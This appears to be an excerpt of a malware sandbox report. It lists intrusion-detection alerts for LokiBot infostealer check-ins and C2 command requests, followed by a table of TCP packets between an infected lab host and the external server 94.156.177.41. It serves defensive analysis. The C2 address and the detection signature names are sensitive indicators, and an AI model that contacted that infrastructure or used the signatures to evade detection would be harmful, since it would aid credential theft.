                                    2024-11-28T13:53:23.160248+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988294.156.177.4180TCP
                                    2024-11-28T13:53:24.492850+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988294.156.177.4180TCP
                                    2024-11-28T13:53:24.624213+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549882TCP
                                    2024-11-28T13:53:24.944914+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988894.156.177.4180TCP
                                    2024-11-28T13:53:24.944914+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988894.156.177.4180TCP
                                    2024-11-28T13:53:24.944914+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988894.156.177.4180TCP
                                    2024-11-28T13:53:26.320757+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988894.156.177.4180TCP
                                    2024-11-28T13:53:26.440822+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549888TCP
                                    2024-11-28T13:53:26.713138+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54989394.156.177.4180TCP
                                    2024-11-28T13:53:26.713138+01002025381ET MALWARE LokiBot Checkin1192.168.2.54989394.156.177.4180TCP
                                    2024-11-28T13:53:26.713138+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54989394.156.177.4180TCP
                                    2024-11-28T13:53:28.140273+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54989394.156.177.4180TCP
                                    2024-11-28T13:53:28.260281+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549893TCP
                                    2024-11-28T13:53:28.528184+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54989794.156.177.4180TCP
                                    2024-11-28T13:53:28.528184+01002025381ET MALWARE LokiBot Checkin1192.168.2.54989794.156.177.4180TCP
                                    2024-11-28T13:53:28.528184+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54989794.156.177.4180TCP
                                    2024-11-28T13:53:30.067360+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54989794.156.177.4180TCP
                                    2024-11-28T13:53:30.188659+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549897TCP
                                    2024-11-28T13:53:30.675910+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990294.156.177.4180TCP
                                    2024-11-28T13:53:30.675910+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990294.156.177.4180TCP
                                    2024-11-28T13:53:30.675910+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990294.156.177.4180TCP
                                    2024-11-28T13:53:32.107303+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990294.156.177.4180TCP
                                    2024-11-28T13:53:32.227331+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549902TCP
                                    2024-11-28T13:53:32.490598+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990894.156.177.4180TCP
                                    2024-11-28T13:53:32.490598+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990894.156.177.4180TCP
                                    2024-11-28T13:53:32.490598+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990894.156.177.4180TCP
                                    2024-11-28T13:53:33.909974+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990894.156.177.4180TCP
                                    2024-11-28T13:53:34.031647+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549908TCP
                                    2024-11-28T13:53:34.319262+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991394.156.177.4180TCP
                                    2024-11-28T13:53:34.319262+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991394.156.177.4180TCP
                                    2024-11-28T13:53:34.319262+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991394.156.177.4180TCP
                                    2024-11-28T13:53:35.792109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991394.156.177.4180TCP
                                    2024-11-28T13:53:35.912159+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549913TCP
                                    2024-11-28T13:53:36.174269+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991794.156.177.4180TCP
                                    2024-11-28T13:53:36.174269+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991794.156.177.4180TCP
                                    2024-11-28T13:53:36.174269+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991794.156.177.4180TCP
                                    2024-11-28T13:53:37.671479+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991794.156.177.4180TCP
                                    2024-11-28T13:53:37.791691+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549917TCP
                                    2024-11-28T13:53:38.049671+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54992394.156.177.4180TCP
                                    2024-11-28T13:53:38.049671+01002025381ET MALWARE LokiBot Checkin1192.168.2.54992394.156.177.4180TCP
                                    2024-11-28T13:53:38.049671+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54992394.156.177.4180TCP
                                    2024-11-28T13:53:39.517673+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54992394.156.177.4180TCP
                                    2024-11-28T13:53:39.637803+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549923TCP
                                    2024-11-28T13:53:39.893533+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54992894.156.177.4180TCP
                                    2024-11-28T13:53:39.893533+01002025381ET MALWARE LokiBot Checkin1192.168.2.54992894.156.177.4180TCP
                                    2024-11-28T13:53:39.893533+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54992894.156.177.4180TCP
                                    2024-11-28T13:53:41.214371+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54992894.156.177.4180TCP
                                    2024-11-28T13:53:41.452206+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549928TCP
                                    2024-11-28T13:53:42.038877+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993194.156.177.4180TCP
                                    2024-11-28T13:53:42.038877+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993194.156.177.4180TCP
                                    2024-11-28T13:53:42.038877+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993194.156.177.4180TCP
                                    2024-11-28T13:53:43.433051+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993194.156.177.4180TCP
                                    2024-11-28T13:53:43.586239+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549931TCP
                                    2024-11-28T13:53:43.814508+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993694.156.177.4180TCP
                                    2024-11-28T13:53:43.814508+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993694.156.177.4180TCP
                                    2024-11-28T13:53:43.814508+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993694.156.177.4180TCP
                                    2024-11-28T13:53:45.291369+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993694.156.177.4180TCP
                                    2024-11-28T13:53:45.416486+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549936TCP
                                    2024-11-28T13:53:45.677207+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994294.156.177.4180TCP
                                    2024-11-28T13:53:45.677207+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994294.156.177.4180TCP
                                    2024-11-28T13:53:45.677207+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994294.156.177.4180TCP
                                    2024-11-28T13:53:47.149209+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994294.156.177.4180TCP
                                    2024-11-28T13:53:47.269321+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549942TCP
                                    2024-11-28T13:53:47.609817+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994894.156.177.4180TCP
                                    2024-11-28T13:53:47.609817+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994894.156.177.4180TCP
                                    2024-11-28T13:53:47.609817+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994894.156.177.4180TCP
                                    2024-11-28T13:53:48.834119+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994894.156.177.4180TCP
                                    2024-11-28T13:53:48.954029+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549948TCP
                                    2024-11-28T13:53:49.229391+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995194.156.177.4180TCP
                                    2024-11-28T13:53:49.229391+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995194.156.177.4180TCP
                                    2024-11-28T13:53:49.229391+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995194.156.177.4180TCP
                                    2024-11-28T13:53:50.737812+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995194.156.177.4180TCP
                                    2024-11-28T13:53:50.857824+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549951TCP
                                    2024-11-28T13:53:51.134807+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995494.156.177.4180TCP
                                    2024-11-28T13:53:51.134807+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995494.156.177.4180TCP
                                    2024-11-28T13:53:51.134807+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995494.156.177.4180TCP
                                    2024-11-28T13:53:52.603990+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995494.156.177.4180TCP
                                    2024-11-28T13:53:52.724013+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549954TCP
                                    2024-11-28T13:53:52.989363+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995994.156.177.4180TCP
                                    2024-11-28T13:53:52.989363+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995994.156.177.4180TCP
                                    2024-11-28T13:53:52.989363+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995994.156.177.4180TCP
                                    2024-11-28T13:53:54.504785+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995994.156.177.4180TCP
                                    2024-11-28T13:53:54.624745+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549959TCP
                                    2024-11-28T13:53:54.895598+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54996594.156.177.4180TCP
                                    2024-11-28T13:53:54.895598+01002025381ET MALWARE LokiBot Checkin1192.168.2.54996594.156.177.4180TCP
                                    2024-11-28T13:53:54.895598+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54996594.156.177.4180TCP
                                    2024-11-28T13:53:56.356808+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54996594.156.177.4180TCP
                                    2024-11-28T13:53:56.476885+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549965TCP
                                    2024-11-28T13:53:56.768164+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997094.156.177.4180TCP
                                    2024-11-28T13:53:56.768164+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997094.156.177.4180TCP
                                    2024-11-28T13:53:56.768164+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997094.156.177.4180TCP
                                    2024-11-28T13:53:58.089738+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997094.156.177.4180TCP
                                    2024-11-28T13:53:58.209770+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549970TCP
                                    2024-11-28T13:53:58.476192+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997594.156.177.4180TCP
                                    2024-11-28T13:53:58.476192+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997594.156.177.4180TCP
                                    2024-11-28T13:53:58.476192+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997594.156.177.4180TCP
                                    2024-11-28T13:53:59.992228+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997594.156.177.4180TCP
                                    2024-11-28T13:54:00.112160+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549975TCP
                                    2024-11-28T13:54:00.536337+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997994.156.177.4180TCP
                                    2024-11-28T13:54:00.536337+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997994.156.177.4180TCP
                                    2024-11-28T13:54:00.536337+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997994.156.177.4180TCP
                                    2024-11-28T13:54:01.812286+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997994.156.177.4180TCP
                                    2024-11-28T13:54:01.933027+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549979TCP
                                    2024-11-28T13:54:02.191446+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54998494.156.177.4180TCP
                                    2024-11-28T13:54:02.191446+01002025381ET MALWARE LokiBot Checkin1192.168.2.54998494.156.177.4180TCP
                                    2024-11-28T13:54:02.191446+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54998494.156.177.4180TCP
                                    2024-11-28T13:54:03.511707+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54998494.156.177.4180TCP
                                    2024-11-28T13:54:03.631691+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549984TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 28, 2024 13:52:04.236696959 CET4970880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:04.356868029 CET804970894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:04.356952906 CET4970880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:04.359332085 CET4970880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:04.479630947 CET804970894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:04.479690075 CET4970880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:04.599642992 CET804970894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:05.944139957 CET804970894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:05.944281101 CET804970894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:05.944288015 CET4970880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:05.944344997 CET4970880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:06.066854954 CET804970894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:06.130779028 CET4970980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:06.252717018 CET804970994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:06.252897978 CET4970980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:06.283209085 CET4970980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:06.410429955 CET804970994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:06.410511017 CET4970980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:06.536931038 CET804970994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:07.903688908 CET804970994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:07.903841019 CET4970980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:07.903939962 CET804970994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:07.904030085 CET4970980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:07.985693932 CET4971180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:08.029609919 CET804970994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:08.111799955 CET804971194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:08.111881971 CET4971180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:08.114020109 CET4971180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:08.237617970 CET804971194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:08.237689018 CET4971180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:08.357779980 CET804971194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:09.514312029 CET804971194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:09.514334917 CET804971194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:09.514499903 CET4971180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:09.514499903 CET4971180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:09.634906054 CET804971194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:09.826821089 CET4971280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:09.948884964 CET804971294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:09.948967934 CET4971280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:09.952279091 CET4971280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:10.072426081 CET804971294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:10.072483063 CET4971280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:10.192854881 CET804971294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:11.594536066 CET804971294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:11.594608068 CET804971294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:11.594715118 CET4971280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:11.594748974 CET4971280192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:11.714786053 CET804971294.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:11.730525970 CET4971380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:11.851219893 CET804971394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:11.851428032 CET4971380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:11.853466988 CET4971380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:11.973452091 CET804971394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:11.973666906 CET4971380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:12.096559048 CET804971394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:13.292371988 CET804971394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:13.292491913 CET804971394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:13.292547941 CET4971380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:13.292573929 CET4971380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:13.412589073 CET804971394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:13.446327925 CET4971480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:13.566427946 CET804971494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:13.566514015 CET4971480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:13.569083929 CET4971480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:13.689404011 CET804971494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:13.689498901 CET4971480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:13.809497118 CET804971494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:15.014285088 CET804971494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:15.014448881 CET804971494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:15.014453888 CET4971480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:15.014504910 CET4971480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:15.135211945 CET804971494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:15.151086092 CET4971580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:15.271121979 CET804971594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:15.271219015 CET4971580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:15.273422003 CET4971580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:15.393717051 CET804971594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:15.393769979 CET4971580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:15.516611099 CET804971594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:16.818991899 CET804971594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:16.819103003 CET4971580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:16.819144964 CET804971594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:16.819216013 CET4971580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:16.939117908 CET804971594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:16.974941969 CET4971880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:17.096725941 CET804971894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:17.096829891 CET4971880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:17.098931074 CET4971880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:17.219099045 CET804971894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:17.219155073 CET4971880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:17.339143991 CET804971894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:18.734575987 CET804971894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:18.734744072 CET804971894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:18.734775066 CET4971880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:18.734798908 CET4971880192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:18.855201006 CET804971894.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:18.870480061 CET4972180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:18.990593910 CET804972194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:18.990696907 CET4972180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:18.992889881 CET4972180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:19.113708019 CET804972194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:19.113785028 CET4972180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:19.234515905 CET804972194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:20.432812929 CET804972194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:20.432892084 CET804972194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:20.433012009 CET4972180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:20.433012009 CET4972180192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:20.553024054 CET804972194.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:20.571300030 CET4972480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:20.691402912 CET804972494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:20.691509008 CET4972480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:20.693635941 CET4972480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:20.813647032 CET804972494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:20.813749075 CET4972480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:20.933706999 CET804972494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:22.279855967 CET804972494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:22.280015945 CET4972480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:22.280045986 CET804972494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:22.280095100 CET4972480192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:22.400000095 CET804972494.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:22.416784048 CET4972680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:22.536734104 CET804972694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:22.536818027 CET4972680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:22.539007902 CET4972680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:22.658930063 CET804972694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:22.659041882 CET4972680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:22.779395103 CET804972694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:24.172015905 CET804972694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:24.172138929 CET804972694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:24.172204018 CET4972680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:24.172204018 CET4972680192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:24.292203903 CET804972694.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:24.307523966 CET4972780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:24.427475929 CET804972794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:24.427601099 CET4972780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:24.429666042 CET4972780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:24.549702883 CET804972794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:24.549788952 CET4972780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:24.722112894 CET804972794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:25.971957922 CET804972794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:25.972024918 CET804972794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:25.972126007 CET4972780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:25.972183943 CET4972780192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:26.096508026 CET804972794.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:26.121695042 CET4973380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:26.241755962 CET804973394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:26.241864920 CET4973380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:26.244560003 CET4973380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:26.365528107 CET804973394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:26.365633011 CET4973380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:26.491128922 CET804973394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:27.874193907 CET804973394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:27.874305964 CET804973394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:27.874306917 CET4973380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:27.874375105 CET4973380192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:27.994452000 CET804973394.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:28.019143105 CET4973980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:28.143258095 CET804973994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:28.143369913 CET4973980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:28.145422935 CET4973980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:28.268826962 CET804973994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:28.268944025 CET4973980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:28.388942957 CET804973994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:29.593564987 CET804973994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:29.593683004 CET804973994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:29.593698978 CET4973980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:29.593729019 CET4973980192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:29.713773966 CET804973994.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:29.746747971 CET4974580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:29.866712093 CET804974594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:29.866847992 CET4974580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:29.872065067 CET4974580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:29.992073059 CET804974594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:29.992183924 CET4974580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:30.112190008 CET804974594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:31.306025028 CET804974594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:31.306157112 CET804974594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:31.306294918 CET4974580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:31.306444883 CET4974580192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:31.448206902 CET4975080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:31.448628902 CET804974594.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:31.568234921 CET804975094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:31.568326950 CET4975080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:31.570786953 CET4975080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:31.691521883 CET804975094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:31.691657066 CET4975080192.168.2.594.156.177.41
                                    Nov 28, 2024 13:52:31.817192078 CET804975094.156.177.41192.168.2.5
                                    Nov 28, 2024 13:52:33.012461901 CET804975094.156.177.41192.168.2.5
